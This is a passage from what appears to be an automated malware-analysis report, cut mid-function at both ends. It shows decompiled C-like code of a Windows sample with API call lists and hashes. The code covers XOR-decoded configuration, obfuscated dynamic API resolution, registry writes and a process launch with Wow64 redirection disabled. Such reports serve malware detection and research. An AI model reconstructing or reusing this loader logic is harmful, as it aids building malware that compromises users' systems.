                                      						E00FAA07B(_t41);
                                      						_t42 = E00FA401A(StrTrimA(_t36, "="), _t36);
                                      						if(_t42 != 0) {
                                      							E00FAA07B(_t36);
                                      							_t36 = _t42;
                                      						}
                                      						_t43 = E00FA53E6(_t36, _t33);
                                      						if(_t43 != 0) {
                                      							E00FAA07B(_t36);
                                      							_t36 = _t43;
                                      						}
                                      					}
                                      					E00FAA07B(_t28);
                                      				}
                                      				return _t36;
                                       			}

                                      0x00fa49ec
                                      0x00fa49ef
                                      0x00fa49f0
                                      0x00fa49f8
                                      0x00fa49ff
                                      0x00fa4a06
                                      0x00fa4a0a
                                      0x00fa4a10
                                      0x00fa4a17
                                      0x00fa4a1c
                                      0x00fa4a24
                                      0x00fa4a2e
                                      0x00fa4a32
                                      0x00fa4a36
                                      0x00fa4a3c
                                      0x00fa4a41
                                      0x00fa4a51
                                      0x00fa4a53
                                      0x00fa4a6a
                                      0x00fa4a6e
                                      0x00fa4a71
                                      0x00fa4a76
                                      0x00fa4a76
                                      0x00fa4a7f
                                      0x00fa4a83
                                      0x00fa4a86
                                      0x00fa4a8b
                                      0x00fa4a8b
                                      0x00fa4a83
                                      0x00fa4a8e
                                      0x00fa4a8e
                                      0x00fa4a99

                                      APIs
                                        • Part of subcall function 00FA8990: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00FA4A06,253D7325,00000000,00000000,00000000,?,00000000,00FA3E0F), ref: 00FA89F7
                                        • Part of subcall function 00FA8990: sprintf.NTDLL ref: 00FA8A18
                                      • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A17
                                      • lstrlen.KERNEL32(00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A1F
                                        • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
                                      • strcpy.NTDLL ref: 00FA4A36
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00FA4A41
                                        • Part of subcall function 00FA51A8: lstrlen.KERNEL32(00000000,00000000,00FA3E0F,00FA3E0F,00000001,00000000,00000000,?,00FA4A50,00000000,00FA3E0F,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA51BF
                                        • Part of subcall function 00FAA07B: HeapFree.KERNEL32(00000000,00000000,00FA8705,00000000,?,?,00000000,?,?,?,?,?,?,00FA2540,00000000), ref: 00FAA087
                                      • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FA3E0F,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A5E
                                        • Part of subcall function 00FA401A: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00FA4A6A,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4024
                                        • Part of subcall function 00FA401A: _snprintf.NTDLL ref: 00FA4082
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                      • String ID: =
                                      • API String ID: 2864389247-1428090586
                                      • Opcode ID: 5c6d553d5ccd2a7cd9e7b2cf3a56fc3ba2ab1ac6a360f62c5cb9444d00d1daa8
                                      • Instruction ID: f3d8bc5efe4371549311bc680cb9ce40034603a2d945e4efe969e0878659888d
                                      • Opcode Fuzzy Hash: 5c6d553d5ccd2a7cd9e7b2cf3a56fc3ba2ab1ac6a360f62c5cb9444d00d1daa8
                                      • Instruction Fuzzy Hash: F511A0F39009297B4612BBB49C85CAF3AAD9E87BA03054015FA05D7201DFBCDD06B7E5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 90%
                                      			E00FA4D8D(int* __ecx) {
                                      				int _v8;
                                      				void* _v12;
                                      				void* __esi;
                                      				signed int _t18;
                                      				signed int _t23;
                                      				char* _t29;
                                      				char* _t30;
                                      				char* _t31;
                                      				char* _t32;
                                      				char* _t33;
                                      				void* _t34;
                                      				void* _t35;
                                      				signed int _t40;
                                      				void* _t42;
                                      				void* _t43;
                                      				signed int _t45;
                                      				signed int _t49;
                                      				signed int _t53;
                                      				signed int _t57;
                                      				signed int _t61;
                                      				signed int _t65;
                                      				void* _t70;
                                      				intOrPtr _t85;
                                      
                                      				_t71 = __ecx;
                                      				_t18 =  *0xfad22c; // 0x63699bc3
                                      				if(E00FA7B3F( &_v12,  &_v8, _t18 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                                      					 *0xfad27c = _v12;
                                      				}
                                      				_t23 =  *0xfad22c; // 0x63699bc3
                                      				if(E00FA7B3F( &_v12,  &_v8, _t23 ^ 0xecd84622) == 0) {
                                      					_push(2);
                                      					_pop(0);
                                      					goto L48;
                                      				} else {
                                      					_t70 = _v12;
                                      					if(_t70 == 0) {
                                      						_t29 = 0;
                                      					} else {
                                      						_t65 =  *0xfad22c; // 0x63699bc3
                                      						_t29 = E00FA289C(_t71, _t70, _t65 ^ 0x724e87bc);
                                      					}
                                      					if(_t29 != 0) {
                                      						_t71 =  &_v8;
                                      						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                      							 *0xfad1f8 = _v8;
                                      						}
                                      					}
                                      					if(_t70 == 0) {
                                      						_t30 = 0;
                                      					} else {
                                      						_t61 =  *0xfad22c; // 0x63699bc3
                                      						_t30 = E00FA289C(_t71, _t70, _t61 ^ 0x2b40cc40);
                                      					}
                                      					if(_t30 != 0) {
                                      						_t71 =  &_v8;
                                      						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                      							 *0xfad1fc = _v8;
                                      						}
                                      					}
                                      					if(_t70 == 0) {
                                      						_t31 = 0;
                                      					} else {
                                      						_t57 =  *0xfad22c; // 0x63699bc3
                                      						_t31 = E00FA289C(_t71, _t70, _t57 ^ 0x3b27c2e6);
                                      					}
                                      					if(_t31 != 0) {
                                      						_t71 =  &_v8;
                                      						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                      							 *0xfad200 = _v8;
                                      						}
                                      					}
                                      					if(_t70 == 0) {
                                      						_t32 = 0;
                                      					} else {
                                      						_t53 =  *0xfad22c; // 0x63699bc3
                                      						_t32 = E00FA289C(_t71, _t70, _t53 ^ 0x0602e249);
                                      					}
                                      					if(_t32 != 0) {
                                      						_t71 =  &_v8;
                                      						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                      							 *0xfad004 = _v8;
                                      						}
                                      					}
                                      					if(_t70 == 0) {
                                      						_t33 = 0;
                                      					} else {
                                      						_t49 =  *0xfad22c; // 0x63699bc3
                                      						_t33 = E00FA289C(_t71, _t70, _t49 ^ 0x3603764c);
                                      					}
                                      					if(_t33 != 0) {
                                      						_t71 =  &_v8;
                                      						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                      							 *0xfad02c = _v8;
                                      						}
                                      					}
                                      					if(_t70 == 0) {
                                      						_t34 = 0;
                                      					} else {
                                      						_t45 =  *0xfad22c; // 0x63699bc3
                                      						_t34 = E00FA289C(_t71, _t70, _t45 ^ 0x2cc1f2fd);
                                      					}
                                      					if(_t34 != 0) {
                                      						_push(_t34);
                                      						_t42 = 0x10;
                                      						_t43 = E00FA8E3C(_t42);
                                      						if(_t43 != 0) {
                                      							_push(_t43);
                                      							E00FA6BB2();
                                      						}
                                      					}
                                      					if(_t70 == 0) {
                                      						_t35 = 0;
                                      					} else {
                                      						_t40 =  *0xfad22c; // 0x63699bc3
                                      						_t35 = E00FA289C(_t71, _t70, _t40 ^ 0xb30fc035);
                                      					}
                                      					if(_t35 != 0 && E00FA8E3C(0, _t35) != 0) {
                                      						_t85 =  *0xfad2d4; // 0x3a49630
                                      						E00FAA302(_t85 + 4, _t38);
                                      					}
                                      					HeapFree( *0xfad1f0, 0, _t70);
                                      					L48:
                                      					return 0;
                                      				}
                                       			}

                                      0x00fa4d8d
                                      0x00fa4d90
                                      0x00fa4db0
                                      0x00fa4dbe
                                      0x00fa4dbe
                                      0x00fa4dc3
                                      0x00fa4ddd
                                      0x00fa4f64
                                      0x00fa4f66
                                      0x00000000
                                      0x00fa4de3
                                      0x00fa4de3
                                      0x00fa4dea
                                      0x00fa4e00
                                      0x00fa4dec
                                      0x00fa4dec
                                      0x00fa4df9
                                      0x00fa4df9
                                      0x00fa4e0a
                                      0x00fa4e0c
                                      0x00fa4e16
                                      0x00fa4e1b
                                      0x00fa4e1b
                                      0x00fa4e16
                                      0x00fa4e22
                                      0x00fa4e38
                                      0x00fa4e24
                                      0x00fa4e24
                                      0x00fa4e31
                                      0x00fa4e31
                                      0x00fa4e3c
                                      0x00fa4e3e
                                      0x00fa4e48
                                      0x00fa4e4d
                                      0x00fa4e4d
                                      0x00fa4e48
                                      0x00fa4e54
                                      0x00fa4e6a
                                      0x00fa4e56
                                      0x00fa4e56
                                      0x00fa4e63
                                      0x00fa4e63
                                      0x00fa4e6e
                                      0x00fa4e70
                                      0x00fa4e7a
                                      0x00fa4e7f
                                      0x00fa4e7f
                                      0x00fa4e7a
                                      0x00fa4e86
                                      0x00fa4e9c
                                      0x00fa4e88
                                      0x00fa4e88
                                      0x00fa4e95
                                      0x00fa4e95
                                      0x00fa4ea0
                                      0x00fa4ea2
                                      0x00fa4eac
                                      0x00fa4eb1
                                      0x00fa4eb1

                                      APIs
                                      • StrToIntExA.SHLWAPI(00000000,00000000,00FA7260,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4E12
                                      • StrToIntExA.SHLWAPI(00000000,00000000,00FA7260,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4E44
                                      • StrToIntExA.SHLWAPI(00000000,00000000,00FA7260,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4E76
                                      • StrToIntExA.SHLWAPI(00000000,00000000,00FA7260,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4EA8
                                      • StrToIntExA.SHLWAPI(00000000,00000000,00FA7260,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4EDA
                                      • HeapFree.KERNEL32(00000000,?,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4F5A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: a671b1add4694fc418f3ff42e783127051d7ff2c648b0966a973761e7f9e1cce
                                      • Instruction ID: 401b74b8d927dbe8052a5e0019dc95bf0e2ed67513591bfdf51d89ec86df41cf
                                      • Opcode Fuzzy Hash: a671b1add4694fc418f3ff42e783127051d7ff2c648b0966a973761e7f9e1cce
                                      • Instruction Fuzzy Hash: E05170F5A10208AECB10EBB89CC5D5BB7EDABCE750B244925B502D3105E6B5FD01BA60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysAllocString.OLEAUT32(?), ref: 00FA95D0
                                      • SysAllocString.OLEAUT32(0070006F), ref: 00FA95E4
                                      • SysAllocString.OLEAUT32(00000000), ref: 00FA95F6
                                      • SysFreeString.OLEAUT32(00000000), ref: 00FA965A
                                      • SysFreeString.OLEAUT32(00000000), ref: 00FA9669
                                      • SysFreeString.OLEAUT32(00000000), ref: 00FA9674
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: String$AllocFree
                                      • String ID:
                                      • API String ID: 344208780-0
                                      • Opcode ID: 71d7d159310818afea703c9f6ad9bd95b31c9360b62d3fe62435986a25f2aed3
                                      • Instruction ID: 25afcaa87f7571f5c5d8fb63874c1170490b5d958042691c2417ab74549ed005
                                      • Opcode Fuzzy Hash: 71d7d159310818afea703c9f6ad9bd95b31c9360b62d3fe62435986a25f2aed3
                                      • Instruction Fuzzy Hash: B3314F72D00609AFDB01DFA8C844A9FB7BAAF4A310F158465ED11EB220DBB5AD05DB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00FA484A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                      				intOrPtr _v8;
                                      				intOrPtr _t23;
                                      				intOrPtr _t26;
                                      				_Unknown_base(*)()* _t28;
                                      				intOrPtr _t30;
                                      				_Unknown_base(*)()* _t32;
                                      				intOrPtr _t33;
                                      				_Unknown_base(*)()* _t35;
                                      				intOrPtr _t36;
                                      				_Unknown_base(*)()* _t38;
                                      				intOrPtr _t39;
                                      				_Unknown_base(*)()* _t41;
                                      				intOrPtr _t44;
                                      				struct HINSTANCE__* _t48;
                                      				intOrPtr _t54;
                                      
                                      				_t54 = E00FA550F(0x20);
                                      				if(_t54 == 0) {
                                      					_v8 = 8;
                                      				} else {
                                      					_t23 =  *0xfad230; // 0x2a9a5a8
                                      					_t1 = _t23 + 0xfae11a; // 0x4c44544e
                                      					_t48 = GetModuleHandleA(_t1);
                                      					_t26 =  *0xfad230; // 0x2a9a5a8
                                      					_t2 = _t26 + 0xfae787; // 0x7243775a
                                      					_v8 = 0x7f;
                                      					_t28 = GetProcAddress(_t48, _t2);
                                      					 *(_t54 + 0xc) = _t28;
                                      					if(_t28 == 0) {
                                      						L8:
                                      						E00FAA07B(_t54);
                                      					} else {
                                      						_t30 =  *0xfad230; // 0x2a9a5a8
                                      						_t5 = _t30 + 0xfae774; // 0x614d775a
                                      						_t32 = GetProcAddress(_t48, _t5);
                                      						 *(_t54 + 0x10) = _t32;
                                      						if(_t32 == 0) {
                                      							goto L8;
                                      						} else {
                                      							_t33 =  *0xfad230; // 0x2a9a5a8
                                      							_t7 = _t33 + 0xfae797; // 0x6e55775a
                                      							_t35 = GetProcAddress(_t48, _t7);
                                      							 *(_t54 + 0x14) = _t35;
                                      							if(_t35 == 0) {
                                      								goto L8;
                                      							} else {
                                      								_t36 =  *0xfad230; // 0x2a9a5a8
                                      								_t9 = _t36 + 0xfae756; // 0x4e6c7452
                                      								_t38 = GetProcAddress(_t48, _t9);
                                      								 *(_t54 + 0x18) = _t38;
                                      								if(_t38 == 0) {
                                      									goto L8;
                                      								} else {
                                      									_t39 =  *0xfad230; // 0x2a9a5a8
                                      									_t11 = _t39 + 0xfae7ac; // 0x6c43775a
                                      									_t41 = GetProcAddress(_t48, _t11);
                                      									 *(_t54 + 0x1c) = _t41;
                                      									if(_t41 == 0) {
                                      										goto L8;
                                      									} else {
                                      										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                      										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                      										_t44 = E00FA6EF1(_t54, _a8);
                                      										_v8 = _t44;
                                      										if(_t44 != 0) {
                                      											goto L8;
                                      										} else {
                                      											 *_a12 = _t54;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _v8;
                                      			}

                                      APIs
                                        • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
                                      • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00FAA418,?,?,?,?,00000000,00000000), ref: 00FA486F
                                      • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00FA4891
                                      • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00FA48A7
                                      • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00FA48BD
                                      • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00FA48D3
                                      • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00FA48E9
                                        • Part of subcall function 00FA6EF1: memset.NTDLL ref: 00FA6F70
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: AddressProc$AllocateHandleHeapModulememset
                                      • String ID:
                                      • API String ID: 1886625739-0
                                      • Opcode ID: fd56923caa6b6c01029f10c73dca3150c8ac76b03e0567cf0394c7c70b4f3650
                                      • Instruction ID: 12f5676c0300dc6bdb23eec37d8976df4b77bf9b5afd5a4e72df335359692380
                                      • Opcode Fuzzy Hash: fd56923caa6b6c01029f10c73dca3150c8ac76b03e0567cf0394c7c70b4f3650
                                      • Instruction Fuzzy Hash: EB2139F150020AAFDB50DF68CD44E6B7BECEF4A354B0045A5E846C7611E774EA04EB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 88%
                                      			E00FA8760(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                      				signed int _v8;
                                      				char _v12;
                                      				signed int* _v16;
                                      				void _v284;
                                      				void* __esi;
                                      				char* _t60;
                                      				intOrPtr* _t61;
                                      				intOrPtr _t65;
                                      				char _t68;
                                      				intOrPtr _t72;
                                      				void* _t73;
                                      				intOrPtr _t75;
                                      				void* _t78;
                                      				void* _t88;
                                      				void* _t96;
                                      				void* _t97;
                                      				int _t102;
                                      				signed int* _t104;
                                      				intOrPtr* _t105;
                                      				void* _t106;
                                      
                                      				_t97 = __ecx;
                                      				_v8 = _v8 & 0x00000000;
                                      				_t102 = _a16;
                                      				if(_t102 == 0) {
                                      					__imp__( &_v284,  *0xfad2ec);
                                      					_t96 = 0x80000002;
                                      					L6:
                                      					_t60 = E00FA8DEA(0,  &_v284);
                                      					_a8 = _t60;
                                      					if(_t60 == 0) {
                                      						_v8 = 8;
                                      						L29:
                                      						_t61 = _a20;
                                      						if(_t61 != 0) {
                                      							 *_t61 =  *_t61 + 1;
                                      						}
                                      						return _v8;
                                      					}
                                      					_t105 = _a24;
                                      					if(E00FA9E7B(_t97, _t105, _t96, _t60) != 0) {
                                      						L27:
                                      						E00FAA07B(_a8);
                                      						goto L29;
                                      					}
                                      					_t65 =  *0xfad230; // 0x2a9a5a8
                                      					_t16 = _t65 + 0xfae908; // 0x65696c43
                                      					_t68 = E00FA8DEA(0, _t16);
                                      					_a24 = _t68;
                                      					if(_t68 == 0) {
                                      						L14:
                                      						_t29 = _t105 + 0x14; // 0x102
                                      						_t33 = _t105 + 0x10; // 0x3d00fac0
                                      						if(E00FA79EF( *_t33, _t96, _a8,  *0xfad2e4,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                      							_t72 =  *0xfad230; // 0x2a9a5a8
                                      							if(_t102 == 0) {
                                      								_t35 = _t72 + 0xfaea0f; // 0x4d4c4b48
                                      								_t73 = _t35;
                                      							} else {
                                      								_t34 = _t72 + 0xfae927; // 0x55434b48
                                      								_t73 = _t34;
                                      							}
                                      							if(E00FA6470( &_a24, _t73,  *0xfad2e4,  *0xfad2e8,  &_a24,  &_a16) == 0) {
                                      								if(_t102 == 0) {
                                      									_t75 =  *0xfad230; // 0x2a9a5a8
                                      									_t44 = _t75 + 0xfae893; // 0x74666f53
                                      									_t78 = E00FA8DEA(0, _t44);
                                      									_t103 = _t78;
                                      									if(_t78 == 0) {
                                      										_v8 = 8;
                                      									} else {
                                      										_t47 = _t105 + 0x10; // 0x3d00fac0
                                      										E00FA63AB( *_t47, _t96, _a8,  *0xfad2e8, _a24);
                                      										_t49 = _t105 + 0x10; // 0x3d00fac0
                                      										E00FA63AB( *_t49, _t96, _t103,  *0xfad2e0, _a16);
                                      										E00FAA07B(_t103);
                                      									}
                                      								} else {
                                      									_t40 = _t105 + 0x10; // 0x3d00fac0
                                      									E00FA63AB( *_t40, _t96, _a8,  *0xfad2e8, _a24);
                                      									_t43 = _t105 + 0x10; // 0x3d00fac0
                                      									E00FA63AB( *_t43, _t96, _a8,  *0xfad2e0, _a16);
                                      								}
                                      								if( *_t105 != 0) {
                                      									E00FAA07B(_a24);
                                      								} else {
                                      									 *_t105 = _a16;
                                      								}
                                      							}
                                      						}
                                      						goto L27;
                                      					}
                                      					_t21 = _t105 + 0x10; // 0x3d00fac0
                                      					if(E00FA7A7D( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                      						_t104 = _v16;
                                      						_t88 = 0x28;
                                      						if(_v12 == _t88) {
                                      							 *_t104 =  *_t104 & 0x00000000;
                                      							_t26 = _t105 + 0x10; // 0x3d00fac0
                                      							E00FA79EF( *_t26, _t96, _a8, _a24, _t104);
                                      						}
                                      						E00FAA07B(_t104);
                                      						_t102 = _a16;
                                      					}
                                      					E00FAA07B(_a24);
                                      					goto L14;
                                      				}
                                      				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                      					goto L29;
                                      				} else {
                                      					memcpy( &_v284, _a8, _t102);
                                      					__imp__(_t106 + _t102 - 0x117,  *0xfad2ec);
                                      					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                      					_t96 = 0x80000003;
                                      					goto L6;
                                      				}
                                      			}

                                      APIs
                                      • StrChrA.SHLWAPI(00FA262A,0000005F,00000000,00000000,00000104), ref: 00FA8793
                                      • memcpy.NTDLL(?,00FA262A,?), ref: 00FA87AC
                                      • lstrcpy.KERNEL32(?), ref: 00FA87C2
                                        • Part of subcall function 00FA8DEA: lstrlen.KERNEL32(?,00FAD2E0,73BB7FC0,00000000,00FA3FBD,?,?,?,?,?,00FA9865,?), ref: 00FA8DF3
                                        • Part of subcall function 00FA8DEA: mbstowcs.NTDLL ref: 00FA8E1A
                                        • Part of subcall function 00FA8DEA: memset.NTDLL ref: 00FA8E2C
                                        • Part of subcall function 00FA63AB: lstrlenW.KERNEL32(00FA262A,?,?,00FA8936,3D00FAC0,80000002,00FA262A,00FA2829,74666F53,4D4C4B48,00FA2829,?,3D00FAC0,80000002,00FA262A,?), ref: 00FA63CB
                                        • Part of subcall function 00FAA07B: HeapFree.KERNEL32(00000000,00000000,00FA8705,00000000,?,?,00000000,?,?,?,?,?,?,00FA2540,00000000), ref: 00FAA087
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00FA87E4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                      • String ID: \
                                      • API String ID: 2598994505-2967466578
                                      • Opcode ID: 651dc0efe3f4c8fcfbdeb395ad5410b745b76d517410e56cd6a200e3849a6dab
                                      • Instruction ID: 49414ecd9d5a8e22f615d58f738436ecefb41455c5246c6749ccd6071d4666d3
                                      • Opcode Fuzzy Hash: 651dc0efe3f4c8fcfbdeb395ad5410b745b76d517410e56cd6a200e3849a6dab
                                      • Instruction Fuzzy Hash: 1C516CF250020AEFDF119FA0CC45EAB7BB9EF0A790F108415F91692161DB79D926FB21
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 32%
                                      			E00FA8134(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                      				intOrPtr _v36;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				void _v60;
                                      				char _v64;
                                      				long _t18;
                                      				intOrPtr _t22;
                                      				intOrPtr _t23;
                                      				long _t29;
                                      				intOrPtr _t30;
                                      				intOrPtr _t31;
                                      				intOrPtr* _t32;
                                      
                                      				_t30 = __edi;
                                      				_t29 = _a4;
                                      				_t31 = __eax;
                                      				_t18 = E00FA9574(_t29, __edi, __eax);
                                      				_a4 = _t18;
                                      				if(_t18 != 0) {
                                      					memset( &_v60, 0, 0x38);
                                      					_t22 =  *0xfad230; // 0x2a9a5a8
                                      					_v64 = 0x3c;
                                      					if(_a8 == 0) {
                                      						_t7 = _t22 + 0xfae4e0; // 0x70006f
                                      						_t23 = _t7;
                                      					} else {
                                      						_t6 = _t22 + 0xfae92c; // 0x750072
                                      						_t23 = _t6;
                                      					}
                                      					_v36 = _t31;
                                      					_t32 = __imp__;
                                      					_v52 = _t23;
                                      					_v48 = _t29;
                                      					_v44 = _t30;
                                      					 *_t32(0);
                                      					_push( &_v64);
                                      					if( *0xfad0e4() != 0) {
                                      						_a4 = _a4 & 0x00000000;
                                      					} else {
                                      						_a4 = GetLastError();
                                      					}
                                      					 *_t32(1);
                                      				}
                                      				return _a4;
                                      			}

                                      APIs
                                        • Part of subcall function 00FA9574: SysAllocString.OLEAUT32(?), ref: 00FA95D0
                                        • Part of subcall function 00FA9574: SysAllocString.OLEAUT32(0070006F), ref: 00FA95E4
                                        • Part of subcall function 00FA9574: SysAllocString.OLEAUT32(00000000), ref: 00FA95F6
                                        • Part of subcall function 00FA9574: SysFreeString.OLEAUT32(00000000), ref: 00FA965A
                                      • memset.NTDLL ref: 00FA8158
                                      • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FA8194
                                      • GetLastError.KERNEL32 ref: 00FA81A4
                                      • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FA81B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                      • String ID: <
                                      • API String ID: 593937197-4251816714
                                      • Opcode ID: dc01d08cb95ecbccbe1a0e355c47862d396be1576f498ec77cf70c2bfc348e64
                                      • Instruction ID: a3302d772abc4e7e82b53abc336283e7434bce552f0cbcf643e15b7c2b92065d
                                      • Opcode Fuzzy Hash: dc01d08cb95ecbccbe1a0e355c47862d396be1576f498ec77cf70c2bfc348e64
                                      • Instruction Fuzzy Hash: C511FAB1D00218ABDB10DFA9DC85BDA7BF8AB0A390F148416F905E6141DBB49505EBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E00FA4FE9(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                      				char _v5;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				char _t28;
                                      				void* _t36;
                                      				void* _t41;
                                      				char* _t42;
                                      				void* _t44;
                                      				void* _t49;
                                      				void* _t50;
                                      				int _t51;
                                      				int _t54;
                                      				void* _t55;
                                      
                                      				_t49 = _a4;
                                      				_t55 = __eax;
                                      				_v12 = 0xb;
                                      				if(_t49 != 0 && __eax != 0) {
                                      					_t5 = _t55 - 1; // -1
                                      					_t42 = _t49 + _t5;
                                      					_t28 =  *_t42;
                                      					_v5 = _t28;
                                      					 *_t42 = 0;
                                      					__imp__(_a8, _t41);
                                      					_v16 = _t28;
                                      					_t50 =  *0xfad0fc(_t49, _a8);
                                      					if(_t50 != 0) {
                                      						 *_t42 = _v5;
                                      						_t44 = RtlAllocateHeap( *0xfad1f0, 0, _a16 + __eax);
                                      						if(_t44 == 0) {
                                      							_v12 = 8;
                                      						} else {
                                      							_t51 = _t50 - _a4;
                                      							memcpy(_t44, _a4, _t51);
                                      							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                      							_t45 = _v16;
                                      							_t54 = _a16;
                                      							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                      							 *_a20 = _t44;
                                      							_v12 = _v12 & 0x00000000;
